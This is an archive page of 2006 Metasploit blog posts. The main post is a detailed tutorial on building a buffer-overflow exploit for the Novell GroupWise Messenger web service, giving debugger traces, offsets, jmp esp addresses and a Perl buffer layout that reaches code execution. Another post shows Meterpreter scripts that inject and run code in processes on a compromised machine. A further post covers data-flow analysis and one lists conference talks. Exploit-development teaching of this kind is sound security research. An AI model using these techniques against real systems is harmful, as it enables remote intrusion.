Skip navigation
All Places > Metasploit > Blog > 2006 > April

Originally Posted by hdm



Exploit modules developed for the Metasploit Framework are designed to contain the smallest amount of "boilerplate" code as possible. This allows us to extend features and APIs without having to rewrite each and every exploit module.  The exploit development process can be time consuming and frustrating - most of the time spent on an exploit is only represented by a few lines of finished code. In this post, I would like to walk you through the development process of a typical exploit module.


On April 13th, 3Com's Zero Day Initiative released an advisory about a buffer overflow in the instant messaging server for Novell GroupWise. The advisory explains that a long Accept-Language header will overwrite the stack, leading to arbitrary code execution.


The first step is to obtain the vulnerable software and install it onto a patched virtual machine. In this case, I chose a Windows 2000 SP4 VMWare image, made sure it was up to date, then started to look for the software. According to Novell's advisory, the vulnerable component can be found in the Novell GroupWise 7 Beta (and fixed in Support Pack 1, Beta 2), but it can also be downloaded as a separate component, without having to install all of GroupWise. GroupWise Messenger requires a NetWare tree and context, which requires eDirectory, which requires the Novell NetWare Client software. The process for installing GroupWise Messenger, from scratch is:


1) Locate a copy of the NetWare client and install it.
2) Download the eDirectory 8.8 Evaluation from Novell and install it.
3) Download the GroupWise Messenger 2 Evaluation from  Novell and install it.


Once you get past the configuration phase, the Messenger installer will ask you if you would like to start the agents (via a checkbox on the last window), check this and finish the install.


Two windows should pop up, one of them is the Archiving Agent and the other is the Messaging Agent. The Messaging Agent is responsible for hosting the vulnerable web service on port 8300. Open up your browser and verify that the web server is online and ready to serve requests. If the agent spits out an error when it starts, you probably specified an invalid redirect address during the install process, just reinstall the Messenger software using a valid, non-loopback IP address.


If you don't see either window, open up the Services control panel item, find the Novell Messager Messaging Agent service, and restart it.


Now that the Messaging Agent is running, we can start playing with the bug. This involves some basic debugging skills and a couple tools. I prefer to use WinDbg from Microsoft, but many folks like the OllyDbg interface and features better.  Regardless of which one you use, start it up, and attach to the Messenging Agent process. The process name will be listed as nmma.exe, and yes there are two of them, but in most cases the one with the higher process ID is the correct one. If you are using WinDbg, use F6 to open the Attach to Process dialog, find nmma.exe, and expand the process information by clicking on the little X to view the command line. The process you want will show nnmMessagingAgent in the command line. Complete attaching to the process, and use the go command (in WinDbg), to get the process running again.


Now that we have a debugger attached to process, its time to reproduce the bug. We need to send a HTTP GET request, with an Accept-Language header consisting of a string over 16 bytes in length. We want to start off with the longest string first and keep decrementing this string with each request until we get the crash. This ensures that the largest number of bytes under our control will be in memory and gives us the best chance of smashing a SEH pointer in the first attempt. The data we use as the string is a non-repeating (a lie, it does repeat, but not for quite a few bytes) alpha-numeric text string generated by Metasploit Framework's Pex library, specifically Pex::Text::PatternCreate(). A sample string looks like:


$ perl -I framework-2.5/lib -e 'use Pex; print Pex::Text::PatternCreate(64)'


Start off using 8192 bytes, then 4096, then 3000, then 2000. When we try 2000 bytes, the debugger throws an exception:


(e10.314): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02c9e1b0 ecx=ffffffff
edx=61614273 esi=02c9e690 edi=61614273
eip=00430a7a esp=02c9e164 ebp=02c9e170
00430a7a f2ae repne scasb es:61614273=??


The scasb instruction compares the byte specified by the address in the edi register with the byte stored in the low 8 bits of the eax register. This opcode increments the edi by one each time it is called. The repne prefix causes this operation to be repeated, for as many times as the ecx register specifies, until the comparison returns true. In this case, we see that eax is 0 and ecx is set to the largest 32-bit value (0xffffffff). This means that this instruction will start reading at the memory address stored in edi and keep scanning until it finds a NULL byte (or 4Gb of data has been processed, not a likely occurrence). The edi register is set to 0x61614273, which is definitely part of the data that we control. To figure out what offset into our string is being used here, we use the script located in the sdk directory of the Metasploit Framework (v2.5).


$ perl sdk/ 0x61614273 8192


No output. This means that before our data was used, the application modified it. We know the data is being used to overwrite some kind of string pointer and we know that the application is trying to figure out how long this string is by scanning it, looking for a NULL byte, and then seeing what ecx has been decremented to, obtaining the length of the string. The function we are in must be strlen() or an equivelent.


If we use Memory view in WinDbg and specifying esp as the address, we notice that the entire stack is covered in our data. The k command, which displays the call stack, shows that the return address of the current function has been smashed with the long text string. Upon closer inspection, we can see that all uppercase characters in our string have been converted to their lowercase equivalents.


We detach from the process and use the Services control panel to restart the service, wait for it to initialize, and then reattach WinDbg. The Novell advisory states that any value greater than 16 bytes will trigger the overflow, so instead of using our long string value, we send only 20 bytes, with the last 4 bytes specified as the string 0000 (0x30303030). The exception is thrown again, this time with edi set to 0x30303d42, 3346 bytes above the address we supplied. To pass this exception, we need to set this offset to a memory address, that when 3346 is added to it, points to a NULL terminated string.


Finding a NULL terminated string in memory isn't difficult, but we need to ensure that the address of the string doesn't contain any uppercase characters, NULLs, new lines, carriage returns, commas, or semicolons. Since we are just reading memory, we can use any loaded DLL that has an address in an acceptable range. On my system the dclient.dll module (part of eDirectory) is loaded at base address 0x61000000 and extends to 0x6104f000. Most of the addresses between 0x61010101 and 0x6104efff should work for us. The address 0x6102010c points to "0x01 0x00", a one-byte string that should allow us to pass the strlen() code. We then decrement this address by 3346 bytes, giving us 0x6101f3f9.


We detach from the process, restart the service, and reattach again. This time, we are going to send 16 bytes of padding, the 0x6101f3f9 address, packed in little-endian format ("\xf9\xf3\x01\x61") and followed by 1024 bytes of the non-repeating string pattern. A new exception appears:


(dc4.dac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=61346961 ecx=00000002
edx=6102010b esi=6102010b edi=61346961
eip=00430a92 esp=02c9e164 ebp=02c9e170
00430a92 f3a4 rep movsb ds:6102010b=01 es:61346961=??


The movsb instruction takes one byte from the address specified by the esi register and writes it to the address specified by the edi register, incrementing both esi and edi by one. The rep prefix indicates that this will repeat for as many times as the value in the ecx register specifies. We can guess that the value in ecx is the return value of our strlen() function, with one byte added to it to account for the NULL trailer. The edi register points to an address that is most definitely under our control. We know that the application will convert all uppercase characters to their lowercase equivalents, so we can start taking a guess at what offset into our non-repeating string is being used as the destination pointer.


$ perl sdk/ 0x61346961 1024
[no output]
$ perl sdk/ 0x41346941 1024


Great! We know that 252 bytes into our pattern, we can overwrite a character pointer that is used as the destination address in the above memory copy routine. At this point, we can set our source pointer to a string we control, and the destination pointer to anything we want to overwrite, and have a field day modifying global variables, overwriting pointers, and generally having our way with the process.


Now lets see what happens if we cause the memory copy to complete without an error. We need another address, this time pointing to writable memory, in a known location, that isn't made up of our restricted characters. Since we are using dclient.dll already for the source pointer, we might as well use it for the destination pointer as well. Using the objdump command, we see that the .data section of the dclient.dll module is at address 0x61041000. To make our memory copy safe, we increment our source pointer by one byte, so that points to NULL byte directly, then we find a destination pointer the .data section that also points to a single NULL byte. It just so happens the first dozen bytes of the .data section are already NULLs, so we can use 0x61041001 as the destination pointer and 0x6101f3fa as the source pointer. Technically, we can just use make both the source and the destination pointers the same and have them point to the same writable address, but you get the idea.


We bounce the service and reattach with the debugger. The next request will be 1024 bytes of non-repeating data, with the 4 bytes at offset 16 replaced with the source address, and the 4 bytes at offset 272 replaced with the destination address.


(db8.c58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000002 ecx=6104100a
edx=61041001 esi=02c9e690 edi=02c9e559
eip=61386961 esp=02c9e2a4 ebp=00000000
61386961 ?? ???


We now have control of the execution path. We use to figure out what offset into our buffer matches up with the address in EIP. After converting the downcased 0x61's to 0x41's, we see that it is offset 264. The question is, what address do we put here? If we open up the WinDbg Memory view again and enter esp as the address, we see the following bytes:


02c9e2a4 69 39 61 6a


Again, we guess at what the un-downcased address was, convert this to little-endian, get 0x6a413969, then call to get offset 268. If we can find a sequence of opcodes in memory that perform a jmp esp, or a push esp; ret, we can use this to return directly back to our buffer. The Framework includes a tool specifically for this purpose, msfpescan. Since our exploit code is already dependent on dclient.dll, lets use msfpescan to look for a jmp esp instruction there:


$ msfpescan -f dclient.dll -j esp
0x6103c3d3  jmp esp
0x6103c92b   jmp esp
0x6103ca53   jmp esp
0x6103cbfb   jmp esp


With the exception of the third address (since 53 = uppercase S), all of these addresses can be used to jump back into our code. If we felt like being crafty, we could use the memcpy() routine to write a jmp esp opcode into a location of our choice, and then return into it. If we replace the 4 bytes at offset 264 with one of these addresses, the application will jump to the location in the esp register and then return into the code we place at offset 268. Since offset 268 is 4 bytes before our destination register, we need to jump past it, and then place our shellcode into the area immediately past the destination register. The easiest way to represent a jmp opcode in x86 is with "\xeb\xXX", where XX is replaced by the number of bytes to jump. This method is limited to jumping 129 bytes forward (127 + 2 bytes for the opcode itself) or 127 bytes backward. At offset 268, we place 2 bytes, "\xeb\x06", which will jump right over the destination pointer. We then place a single byte at offset 276, "\xcc", which represents the "int3" instruction that will cause the application to trap the debugger.


The entire string now looks like:


my $pattern = Pex::Text::PatternCreate(1024);
substr($pattern, 16, 4,  pack('V', 0x6101f3fa)); # SRC
substr($pattern, 272, 4, pack('V', 0x61041001)); # DST
substr($pattern, 264, 4, pack('V', 0x6103c3d3)); # JMP ESP
substr($pattern, 268, 2, "\xeb\x06"); # JMP +6
substr($pattern, 276, 1, "\xcc"); # TRAP


We detach from the process, restart the service, reattach, and send our new string:


(d78.33c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000002 ecx=6104100a
edx=61041001 esi=02c9e690 edi=02c9e559
eip=02c9e2ac esp=02c9e2a4 ebp=00000000
02c9e2ac cc int 3


Hurray! We now have arbitrary code execution. The final trick is replacing the 0xCC byte with real shellcode that doesn't contain any of the restricted or uppercase characters. The current version of the Metasploit Framework has a tough time avoiding A-Z, so only a few payloads can be successfully encoded (such as win32_reverse_ord). The finished exploit module for version 2.5 can be automatically installed using the msfupdate -u command.




The Novell Messenger Messaging Agent service terminated unexpectedly.  It has done this 78 time(s).  The following corrective action will be taken in 0 milliseconds: No action

Originally Posted by skape



In a previous post I illustrated a very basic data flow dependency graph.  This graph was meant to describe the order (and thus dependencies) of memory read and write operations within the context of a given function.  While this graph may be useful in some circumstances, the simple fact that it's limited to a specific function means that there will be no broad applicability or understanding of the program as a whole.  To help solve that problem, it makes sense to try to come up with a way to describe data flow dependencies in a manner that crosses procedural boundaries.  By doing this, it is possible to illustrate dependencies between functions by analyzing both a function's formal parameters (both actual arguments and global variable references) and output data (such as its return value). 


To better understand this, let's take an example C program as illustrated below:



typedef struct _list_entry
   struct _list_entry *next;
   struct _list_entry *prev;
} list_entry;

list_entry *list = NULL;

list_entry *add()
   list_entry *ent = (list_entry *)malloc(sizeof(list_entry));
   if (list)
      ent->prev = list->prev;
      ent->next = list->next;
      if (list->prev)
         list->prev->next = ent;
      if (list->next)
         list->next->prev = ent;
   list = ent;
   return ent;

void remove(list_entry *ent)
   if (ent->prev)
      ent->prev->next = ent->next;
   if (ent->next)
      ent->next->prev = ent->prev;

void thread(void *nused)
   while (1)
      list_entry *ent = add();

int main(int argc, char **argv)
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread, NULL, 0, NULL);
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread, NULL, 0, NULL);



This program is a very simple (and intentionally flawed in more ways than one) linked list implementation.  The basic idea is that three threads run simulatenously, each inserting and removing a node from the list as fast as possible.  In another post in the future I'll talk about how we can use data flow analysis to attempt to identify data consistency issues in a multi-threaded application (such as this), but for now, let's focus simply on doing interprocedural data flow analysis.  Keep in mind from our previous post that there are two types of data flow dependencies, a value dependency and an address dependency.  A value dependency, denoted by blue edges, means that one instruction depends on the value read from memory (Example: mov [ebp-0x4],eax depends on mov eax,[ebp+0x8] for the value of eax).  An address dependency, denoted by red edges, means that a value read from memory is being used to reference another location in memory (Example: mov [ecx],eax depends on mov ecx,[edx] since ecx is being used as a pointer that was obtained through edx).


When we compile the example program, we can use our existing intraprocedural data flow analysis approach to identify localized data dependencies using a disassembler specific to the architecture that we compiled the program for.  While this works perfectly fine, it can end up being more complicated than it would otherwise need to be.  An alternative approach that has been used in other projects (such as valgrind) is to take the architecture specific code and translate it into a more universal instruction set.  By doing this, we can write our tools in a manner that allows us to not care about the underlying architecture, thus masking a degree of complexity and code duplication.  I'm not going to go into the specifics of the instruction set that MSRT uses at this point, but the important matter is that it boils down all operations that result in memory access into a load or store operation (potentially using a temporary pseudo-register when necessary).  This allows us to more easily determine data flow dependencies.  With this in mind, let's try to understand the graph that is generated when we do an interprocedural data flow analysis on the program displayed above:




At first glance this graph is probably pretty confusing, so let's try to work our way out from a known point so that we can better understand what's going on.  First, it's important to understand that the direction of the edges denotes that u depends on v where the edge is pointing to v.  Knowing this, it probably makes sense to start at the only node that isn't dependent on anything else: the call malloc node.


If we work our way backwards from this node, we can begin to better understand how the nodes relate to the source code.  For instance, we see that the node store eax, [ebp-0x4] depends on call malloc.  The reason for this dependency is because malloc is the last node to modify eax.  If we look at the source code, we see that the first thing done after malloc returns is that the ent local variable is set to the return value.  As one would expect, the ent local variable is located at ebp-0x4.  If we follow the dependencies backward one node further to store edx, [0x55], we can correlate this to the setting of the global variable list (which, in this disassembly, is represented as existing at address 0x55).  Try walking back further to see if you can associate other portions of the data dependency graph with areas of the source code within the add function.


Back on topic, though, I want to focus on illustrating how the interprocedural dependency relationships are conveyed.  As we can see, each of the three functions is identified by a different node color.  add is represented by green, thread is represented by cyan, and remove is represented by magenta.  The dotted line between nodes of a different color represents an interprocedural dependency.  Let's focus on the dependency between add and thread first.


As we know from the source code, the thread function takes the return value from add and passes it to remove.  This is conveyed in terms of a data flow dependency by noting that eax is set prior to returning from add.  Therefore, the use of eax within the thread function implies an interprocedural value dependency between the load [ebp-0x4], eax instruction in add and the store eax, [ebp-0x4] instruction in thread.
Furthermore, if we follow the value dependencies up from that point, we can see that the return value from add is subsequently passed as the first actual argument to remove.  By virtue of this fact, an interprocedural value dependency exists between the the first argument of remove and the return value of add.


In the interest of not writing a book, I'm going to cut this post a bit short here.  In closing, there are many interesting things that you can learn by understanding the different aspects of a data flow graph.  For instance, you can begin the process of simplifying the graph.  One way of simplifying the graph would be through value dependency reduction.  This means that any time you have the scenario of u depends on v for value and v depends on z for value, you can reduce it to u depends on z for value.  Try it out with the sample graph above and see if it makes sense.  Another interesting thing you can do is translate the graph into a series of equations or statements that describe the data flow process by simply turning each of the edges into a function of the node (or derived node) that they depend on. 


At the moment MSRT doesn't have full support for some of the things described in this post (the graph was actually generated using a combination of manual and automated analysis).  Hopefully this post wasn't too incoherent =)  It's a tad bit late...

Originally Posted by skape



So what does it mean when we talk about all the cool automation support that Metasploit 3.0 has? Well, the answer is fairly broad. It means you can implement plugins and other tools that can be used to extend and automate a number of features included in the framework. By virtue of this fact, it means that you can extend and automate one of the areas that I personally find the most interesting: post-exploitation payloads. Spoonm and I recently completed a tour of duty describing some of the cool accomplishments in the area of post-exploitation technology. One post-exploitation payload that we focused most of our attention on was Meterpreter. In Metasploit 3.0, we spent some time thinking about what could be done to make meterpreter more useful. As you might have guessed, our conclusion was to make it more accessible from a scripting level rather than strictly through the user-interface. Through some of the examples below, I hope to illustrate a few random things you can do with this scripting interface. Keep in mind that this is just an very small example of the things that you can do :).


To easily demonstrate these examples, I made use of Meterpreter's builtin IRB mode.  For those familiar with the irb script that comes with Ruby, you'll be right at home with Meterpreter's IRB mode. In IRB mode, you can drop into what is most easily thought of as a Ruby shell. In this shell (with full readline support), you can write Ruby on the fly to do whatever it is you want. In this case, we'll be writing a few small scriptlets that operate on an established Meterpreter client connection. Even though I used IRB mode, it is equally possible to write standalone scripts. To drop into IRB mode from a Meterpreter session, simply do the following:



meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client




The client variable is automatically scoped such that it represents the Meterpreter client session. Through the client instance it is possible to access all of the features provided by the Meterpreter session and its extensions. With the background out of the way, it's time to actually demonstrate some stuff.


Example #1: Creating a thread and running arbitrary code


This example shows how you can use Meterpreter to create a thread that executes arbitrary code that you define either in the current process or in another process running on an exploited machine. Perhaps you have a payload blob lying around that you previously used as a staged payload and now you want to execute it after you've successfully loaded meterpreter? Or perhaps you have other uses...



>> p = client.sys.process.execute('calc.exe')
>> buf = p.memory.allocate(4096)
=> 7929856
>> "%.8x" % 7929856
=> "00790000"
>> p.memory.write(0x00790000, "\xcc")
=> 1
>> thr = p.thread.create(0x00790000, 0)



As shown above, calc.exe is executed and a process instance is stored in the variable p.  From there, 4096 bytes of memory is allocated at an arbitrary location, the address of which is stored in the variable buf.  From there, the arbitrary payload is written to the region of memory (which in this case is simply \xcc). Finally, we create a thread using the base address of the allocation as the thread entry point. The end result: a new thread is created that executes our int 3.



Example #2: Searching a process' address space


What if you have a specific chunk of data that you want to locate in a process' address space? Fear not, for Meterpreter has builtin support for performing all of the basic memory management functions that will allow you to search for whatever it is you want. In this example, we're simply searching the address space for the locations of a jmp esp instruction.  Why would we want to do this?  Who knows.  It's just an illustration :).



>> p =
>> addr = 0
=> 0
>> while addr <= 0x7ffe0000
>>    info  = p.memory.query(addr)
>>    addr += info['RegionSize']
>>    next if (info['Available'])
>>    buf   =['BaseAddress'], info['RegionSize'])
>>    off   = 0
>>    while off = buf.index("\xff\xe4", off)
>>       puts "jmp esp at %.8x" % (info['BaseAddress'] + off)
>>       off += 1
>>    end
>> end
jmp esp at 00235028
jmp esp at 004894fb
jmp esp at 010197c4
jmp esp at 01019a0d
jmp esp at 77e4c57e
jmp esp at 77f5801c
jmp esp at 77f77343
=> nil



This approach works simply by enumerating all of the regions in a process' address space (in this case the current process). As it finds regions that aren't available (meaning they are allocated), it reads the entire region and searches for the opcodes that compose the jmp esp instruction.  As it finds matches, it displays the locations at which they reside.


Example #3: Loading libraries and getting symbol addresses


What if you want to write some custom code to proxy calls to API functions on the remote machine? Well, if you're going to do that, then you're going to need some way to load libraries and resolve the locations of the symbols via the dynamic loader. To facilitate this (and other things), Meterpreter provides an (hopefully) easy interface. The example below shows how you can load a library, in this case ws2_32.dll into the address space of a process and then proceed to resolve symbols.



>> p = client.sys.process.execute('calc')
>> "%.8x" % p.image['kernel32.dll']
=> "77e60000"
>> "%.8x" % p.image['ws2_32.dll']
=> "00000000"
>> p.image.load('ws2_32.dll')
=> 1907032064
>> "%.8x" % p.image['ws2_32.dll']
=> "71ab0000"
>> "%.8x" % p.image.get_procedure_address('ws2_32.dll', 'connect')
=> "71ab3e5d"



Fairly straight forward, right?


In this post, I focused primarily on memory management and the dynamic loader interface. Keep in mind that these are just a few examples of the things you can do with a process. Furthermore, these are just a few examples of the things you can do with Meterpreter itself. With the ability to load arbitrary extensions (in the form of DLLs), the possibilities are endless...or something :).

Originally Posted by hdm



Just a few highlights from the CanSecWest 2006 conference:


The slides for my Metasploitation talk are now online, look forward to a new code release sometime next week. TK posted a really nice review on the nCircle Blog.


Julien Tiennes presented on HIPS evasion and released the SLIPFEST toolkit for HIPS evaluation.


Renaud Bidou presented on IPS testing and released an IPS evaluation toolkit.


Dennis Cox presented on common flaws in network security devices, particularly inline systems such as routers, switches, and intrusion prevention systems. His slides should be available from the web site sometime soon


van Hauser (of THC fame), presented (old copy) on hacking the IPv6 protocol and released a new version of his  IPv6 tools.


Nico Fishbach presented on the state of VoIP carrier security, leaving most of the audience cringing in horror.


Halvar Flake presented on finding and exploiting bugs involving uninitialized variables, inspiring me to take another look at MS02-018. He uses some really fun tricks to figure out what stack space overlaps between function calls.


Matt Murphy and I developed a quick browser CSS fuzzer and presented it during a two minute lightning talk at the end of the day.


Major Malfunction presented on some really cool tricks involving magnetic strips (credit cards, hotel keys, boarding passes...).


Eric Byres (and colleages) presented on common flaws in SCADA equipment and demonstrated a nifty testing tool called Achilles.


The complete list of CanSecWest presentations can be found HERE


Filter Blog

By date: By tag: